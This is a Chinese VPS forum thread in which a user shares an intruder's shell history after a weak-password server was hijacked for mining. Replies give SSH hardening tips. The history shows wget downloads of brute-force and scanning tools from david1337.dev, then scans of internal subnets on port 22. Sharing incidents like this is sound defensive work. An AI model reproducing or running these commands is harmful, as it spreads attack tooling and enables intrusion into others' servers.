全球主机交流论坛

标题: 一不小心被挖矿了 [打印本页]
作者: c菌    时间: 2022-2-15 23:14
标题: 一不小心被挖矿了
本帖最后由 c菌 于 2022-2-15 23:16 编辑

防范意识薄弱,小鸡用的弱密码,没禁用密码登陆,今天登上机器看cpu100%,
马上意识到被挖矿了。看了下历史记录

  1. sudo -i
  2.   133  exit
  3.   134  nproc
  4.   135  lscpu
  5.   136  exit
  6.   137  nproc
  7.   138  exit
  8.   139  nproc
  9.   140  ls
  10.   141  ip r
  11.   142  exit
  12.   143  wget david1337.dev/brute
  13.   144  wget david1337.dev/banner
  14.   145  wget david1337.dev/ps
  15.   146  chmod +x *
  16.   147  ip r
  17.   148  ./ps 10.42 22
  18.   149  ./ps 192.168 22
  19.   150  ./ps 172.17 22
  20.   151  ls
  21.   152  exit
  22.   153  lscpu
  23.   154  ls
  24.   155  exit
  25.   156  top
  26.   157  exit
  27.   158  clear
  28.   159  ls
复制代码


淦塔皮燕纸 david1337.dev
作者: toot    时间: 2022-2-15 23:16
拿到鸡第一步。修改密码,3种混合。修改22端口。开启bbr
作者: c菌    时间: 2022-2-15 23:17
toot 发表于 2022-2-15 23:16
拿到鸡第一步。修改密码,3种混合。修改22端口。开启bbr

不放心还是重装了
作者: konololi    时间: 2022-2-15 23:22
第一步不就是禁密码登录改成密钥么,
密钥还更方便
作者: como    时间: 2022-2-15 23:28
端口只对白名单ip开放,稳得一比,你密码设置123都没问题
作者: HOH    时间: 2022-2-15 23:28
这个矿工不专业,鞋套都不戴,差评
作者: hcyme    时间: 2022-2-15 23:30
密钥,其他都是默认,dmit什么的开机就是密钥,更规范
作者: 冲浪麦浪花郎    时间: 2022-2-15 23:44
https://ddzzz.eu.org/thread-957070-1-1.html




* Linux常用命令:rar a file1.rar file1 file2 dir1 同时压缩 'file1', 'file2' 以及目录 'dir1'



* 资源 https://t.me/MJJ_aliyundrive
* MJJ频道 https://t.me/wearemjj
* Linux命令大全 https://www.linuxcool.com
* HostLoc频道 https://t.me/myhostloc
   
作者: 母鸡给的邀请码    时间: 2022-2-15 23:59
三个脚本被删除了。楼主有备份吗 发出来学习下



欢迎光临 全球主机交流论坛 (https://ddzzz.eu.org/) Powered by Discuz! X3.4